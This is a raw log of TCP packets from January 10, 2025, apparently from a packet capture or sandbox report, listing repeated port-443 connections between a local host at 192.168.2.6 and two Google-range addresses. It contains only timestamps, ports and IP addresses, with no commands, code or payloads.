Jan 10, 2025 15:45:28.580651999 CET	57077	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:28.598475933 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:28.598517895 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:28.598593950 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:28.599023104 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:28.599035978 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:29.811404943 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:29.811492920 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:29.812088013 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:29.812093973 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:29.812256098 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:29.812259912 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:30.172408104 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:30.172454119 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:30.172538042 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:30.172554970 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:30.172578096 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:30.172588110 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:30.173322916 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:30.173352957 CET	443	57078	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:30.173448086 CET	57078	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:30.298264980 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.298299074 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:30.298371077 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.298861027 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.298877001 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:30.951351881 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:30.951436043 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.951947927 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.951958895 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:30.952291965 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:30.952297926 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:31.259442091 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:31.259547949 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:31.259558916 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:31.259686947 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:31.259716988 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:31.259762049 CET	443	57079	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:31.259856939 CET	57079	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:31.278732061 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.278781891 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:31.278860092 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.279109955 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.279123068 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:31.937714100 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:31.937824011 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.940586090 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.940593004 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:31.940838099 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:31.940892935 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.941143990 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:31.983381987 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:32.378876925 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:32.378909111 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:32.379044056 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:32.379053116 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:32.379102945 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:32.379689932 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:32.379715919 CET	443	57080	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:32.379765034 CET	57080	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:32.516488075 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:32.516527891 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:32.516613007 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:32.516969919 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:32.516978025 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.156460047 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.156616926 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.157126904 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.157188892 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.159018040 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.159027100 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.159274101 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.159327030 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.159775972 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.203324080 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.543915987 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.544039011 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.544070959 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.544128895 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.544250011 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.544295073 CET	443	57081	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:33.544348001 CET	57081	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:33.572518110 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:33.572557926 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:33.572879076 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:33.572879076 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:33.572916985 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.210875988 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.211009979 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.212764025 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.212769985 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.213012934 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.213066101 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.213433981 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.259336948 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.663724899 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.663784027 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.663877964 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.663877010 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.663877010 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.663919926 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.664506912 CET	57082	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:34.664529085 CET	443	57082	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:34.782160044 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:34.782203913 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:34.782301903 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:34.782602072 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:34.782609940 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.415193081 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.415337086 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.416121006 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.416193962 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.417953014 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.417960882 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.418210983 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.418322086 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.418725967 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.463327885 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.918693066 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.918768883 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.918839931 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.918874025 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.919085026 CET	57083	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:35.919100046 CET	443	57083	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:35.924455881 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:35.924490929 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:35.924601078 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:35.925064087 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:35.925077915 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:36.553983927 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:36.554116011 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:36.554790020 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:36.554802895 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:36.554924965 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:36.554930925 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.005336046 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.005429029 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.005479097 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:37.005497932 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.005517006 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.005534887 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:37.005604029 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:37.005604029 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:37.006546021 CET	57084	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:37.006571054 CET	443	57084	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:37.126662016 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.126741886 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:37.126835108 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.127171993 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.127191067 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:37.754251957 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:37.754368067 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.754895926 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.754911900 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:37.755127907 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:37.755137920 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.134207010 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.134466887 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:38.134506941 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.134562016 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:38.135140896 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.135189056 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:38.135199070 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.135247946 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:38.137409925 CET	57085	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:38.137428999 CET	443	57085	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:38.154244900 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.154304028 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:38.154423952 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.154684067 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.154701948 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:38.829267025 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:38.829385042 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.829973936 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.829986095 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:38.830202103 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:38.830210924 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.299535990 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.299593925 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.299640894 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:39.299654961 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.299675941 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.299680948 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:39.299705982 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:39.299730062 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:39.300503016 CET	57086	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:39.300518036 CET	443	57086	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:39.423194885 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:39.423259974 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:39.423402071 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:39.423782110 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:39.423799992 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.057245016 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.057362080 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.057899952 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.057929039 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.058109999 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.058124065 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.437949896 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.438081026 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.438112974 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.438169956 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.438215971 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.438268900 CET	443	57087	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:40.438333035 CET	57087	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:40.456140041 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:40.456187010 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:40.456258059 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:40.456466913 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:40.456484079 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.141458035 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.141652107 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.142174959 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.142205954 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.142323971 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.142338037 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.650181055 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.650249004 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.650320053 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.650389910 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.650391102 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.650391102 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.651098967 CET	57088	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:41.651148081 CET	443	57088	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:41.782325029 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:41.782376051 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:41.782460928 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:41.782768011 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:41.782782078 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.605676889 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.605798960 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.606642962 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.606713057 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.608489990 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.608499050 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.608882904 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.608949900 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.609292030 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.651335001 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.989794970 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.989878893 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:42.990024090 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.990025043 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.990219116 CET	57089	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:42.990236998 CET	443	57089	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:43.002257109 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.002317905 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:43.002393007 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.002597094 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.002614021 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:43.640408993 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:43.640517950 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.641032934 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.641043901 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:43.641251087 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:43.641257048 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:44.085828066 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:44.085879087 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:44.085953951 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:44.085973024 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:44.086004019 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:44.086060047 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:44.086709976 CET	57090	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:44.086735010 CET	443	57090	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:44.220252037 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.220308065 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:44.220417023 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.220760107 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.220774889 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:44.849010944 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:44.849085093 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.849626064 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.849642038 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:44.849930048 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:44.849936008 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:45.232975006 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:45.233227015 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:45.233239889 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:45.233310938 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:45.233513117 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:45.233551979 CET	443	57091	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:45.233608007 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:45.233688116 CET	57091	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:45.250336885 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.250375032 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:45.250468016 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.250858068 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.250866890 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:45.926868916 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:45.927081108 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.927917004 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.927922964 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:45.928088903 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:45.928092957 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.371624947 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.371679068 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.371742964 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:46.371753931 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.371762991 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:46.371778965 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.371799946 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:46.371829033 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:46.372483015 CET	57092	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:46.372493029 CET	443	57092	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:46.501662016 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:46.501712084 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:46.501836061 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:46.502125025 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:46.502141953 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.296377897 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.296454906 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.297168016 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.297225952 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.299819946 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.299829960 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.300071955 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.300122976 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.300549984 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.343326092 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.686110973 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.686176062 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.686191082 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.686232090 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.686366081 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.686427116 CET	443	57093	142.250.184.238	192.168.2.6
Jan 10, 2025 15:45:47.686480045 CET	57093	443	192.168.2.6	142.250.184.238
Jan 10, 2025 15:45:47.698729038 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:47.698772907 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:47.698851109 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:47.699084997 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:47.699094057 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.346903086 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.347182989 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.347758055 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.347764969 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.347934008 CET	57094	443	192.168.2.6	142.250.185.65
Jan 10, 2025 15:45:48.347939014 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786257982 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786319017 CET	443	57094	142.250.185.65	192.168.2.6
Jan 10, 2025 15:45:48.786351919 CET	57094	443	192.168.2.6	142.250.185.65
